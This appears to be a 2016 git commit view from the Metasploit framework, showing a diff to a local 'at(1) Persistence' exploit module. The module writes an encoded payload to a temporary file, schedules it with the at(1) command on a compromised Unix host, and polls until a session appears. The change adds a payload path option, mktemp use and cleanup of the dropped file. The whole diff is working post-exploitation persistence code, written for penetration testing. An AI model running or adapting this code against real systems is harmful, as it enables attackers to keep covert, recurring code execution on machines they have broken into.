Fix cmd execution; use and cleanup temporary files

bug/bundler_fix
Jon Hart 2016-09-13 20:51:32 -07:00
parent 972db476ef
commit 15e44e296b
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 23 additions and 4 deletions

View File

@ -16,6 +16,7 @@ class MetasploitModule < Msf::Exploit::Local
info,
'Name' => 'at(1) Persistence',
'Description' => %q(
This module achieves persisience by executing payloads via at(1).
),
'License' => MSF_LICENSE,
'Author' =>
@ -42,7 +43,13 @@ class MetasploitModule < Msf::Exploit::Local
register_options(
[
OptString.new('TIME', [false, 'When to run job via at(1). Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
OptBool.new('CLEANUP', [true, 'Delete payload after execution', true])
]
)
register_advanced_options(
[
OptString.new('PATH', [false, 'Path to store payload to be executed by at(1). Leave unset to use mktemp'])
]
)
end
@ -56,14 +63,26 @@ class MetasploitModule < Msf::Exploit::Local
end
end
def cmd_exec(cmd)
super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}")
end
def exploit
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NoAccess, 'User denied cron via at.deny')
end
write_file("/tmp/test.sh", payload.encoded)
cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
unless payload_file = datastore['PATH'] || cmd_exec('mktemp')
fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
end
write_file(payload_file, payload.encoded)
cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
register_files_for_cleanup(payload_file) if datastore['CLEANUP']
print_status("Waiting #{datastore['WfsDelay']}sec for execution")
Rex.sleep(datastore['WfsDelay'].to_i)
0.upto(datastore['WfsDelay'].to_i) do
Rex.sleep(1)
break if session_created?
end
end
end